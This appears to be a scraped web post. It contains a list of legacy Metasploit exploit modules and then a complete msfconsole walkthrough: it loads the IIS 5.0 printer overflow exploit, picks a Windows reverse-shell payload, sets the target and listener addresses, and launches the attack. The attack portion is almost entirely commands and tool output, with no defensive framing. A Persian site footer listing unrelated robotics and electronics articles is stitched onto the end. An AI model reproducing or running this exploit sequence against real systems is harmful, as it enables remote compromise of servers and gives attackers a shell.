imail_ldap IMail LDAP Service Buffer Overflow
lsass_ms04_011 Microsoft LSASS MSO4-011 Overflow
mercantec_softcart Mercantec SoftCart CGI overflow
msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026
mssql2000_preauthentication Microsoft SQL Server Hello Buffer Overflow
mssql2000_resolution MSSQL 2000 Resolution Overflow
openview_omniback HP OpenView Omniback II Command Execution
poptop_negative_read Poptop Negative Read Overflow
realserver_describe_linux RealServer Describe Buffer Overflow
samba_nttrans Samba Fragment Reassembly Overflow
samba_trans2open Samba trans2open Overflow
sambar6_search_results Sambar 6 Search Results Buffer Overflow
servu_mdtm_overflow Serv-U FTPD MDTM Overflow
smb_sniffer SMB Password Capture Service
solaris_sadmind_exec Solaris sadmind Command Execution
squid_ntlm_authenticate Squid NTLM Authenticate Overflow
svnserve_date Subversion Date Svnserve
ut2004_secure_linux Unreal Tournament 2004 "secure" Overflow (Linux)
ut2004_secure_win32 Unreal Tournament 2004 "secure" Overflow (Win32)
warftpd_165_pass War-FTPD 1.65 PASS Overflow
windows_ssl_pct Windows SSL PCT Overflow

msf > [B]use iis50_printer_overflow
msf iis50_printer_overflow > show options

Exploit Options
===============

Exploit: Name Default Description
-------- ------ ------- ------------------
optional SSL Use SSL
required RHOST The target address
required RPORT 80 The target port

Target: Windows 2000 SP0/SP1
msf iis50_printer_overflow > show Targets

Supported Exploit Targets
=========================

0 Windows 2000 SP0/SP1

msf iis50_printer_overflow > set TARGET 0
TARGET -> 0
msf iis50_printer_overflow > show payloads

Metasploit Framework Usable Payloads
====================================

win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_ie Windows Reverse InlineEgg Stager
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server DLL Inject

msf iis50_printer_overflow > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf iis50_printer_overflow(win32_reverse) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------- ------------------
optional SSL Use SSL
required RHOST The target address
required RPORT 80 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

optional EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Windows 2000 SP0/SP1

msf iis50_printer_overflow(win32_reverse) > set RHOST 192.168.0.10
RHOST -> 192.168.0.10
msf iis50_printer_overflow(win32_reverse) > set RPORT 80
RPORT -> 80
msf iis50_printer_overflow(win32_reverse) > set LHOST 192.168.0.1
LHOST -> 192.168.0.1
msf iis50_printer_overflow(win32_reverse) > set LPORT 4321
LPORT -> 4321
msf iis50_printer_overflow(win32_reverse) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------------ ------------------
optional SSL Use SSL
required RHOST 192.168.0.10 The target address
required RPORT 80 The target port

Payload: Name Default Description
-------- -------- ----------- ---------------------------------------
---
optional EXITFUNC seh Exit technique: "process", "thread", "s
eh"
required LHOST 192.168.0.1 Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Windows 2000 SP0/SP1

msf iis50_printer_overflow(win32_reverse) > exploit
Starting Reverse Handler.
Trying Windows 2000 SP0/SP1 using return to esp at 0x732c45f3...
Exiting Reverse Handler....
...............
__________________
source computer:arrow

قیر
علل آسیب پذیری ساختمان ها
معماری داخلی
اهمییت نور در معماری و تصاویر مربوط به کاربرد نور در معماری
صوت سنج مونو 10 كاناله
كلید صوتی
نوری كلید220 ولت
خبر كننده تلفن
شبكه ی بیسیم صدای رادیویی دیتا
مدار تقویت آنتن
منبع تغذیه بدون ترانس
مدار گوشی طبی (شنیدن ضربان قلب )
هشدار دهنده قبل از زنگ موبایل
سنسورها در ربات
میکرو کنترولر ها
سرو موتور
انواع موتورها
آشنایی با رشته ی مهندسی رباتیک1
هوش مصنوعی2
هوش مصنوعی
آموزش آموزش راه اندازی موتور dc با استفاده آز ic driver l293d در دو جهت
آموزش آموزش راه اندازی موتور پله ای مغناطیس دائم با استفاده از آی سی درایور l293d
آموزش چگونه یک ربات مسیریاب بسازیم
مقاله مبانی مهندسی رباتیک
مقاله رباتیک و اتوماسیون صنعتی در ایران و جهان
معرفی هشت کار مهم و اساسی که به زودی رباتها انجام خواهند داد
خلاص شدن از نامه های ناخاسته توسط فیلتر کردن
برنامه تبدیل فایل های youtube به دیگر فایلهای تصویری
آموزش Opera 9.0 و بررسی امکانات آن
داشتن چند id مجازی

با عضویت در خبرنامه ی سایت از کلیه امکانات سایت بهره مند شده و از بروز شدن سایت مطلع شوید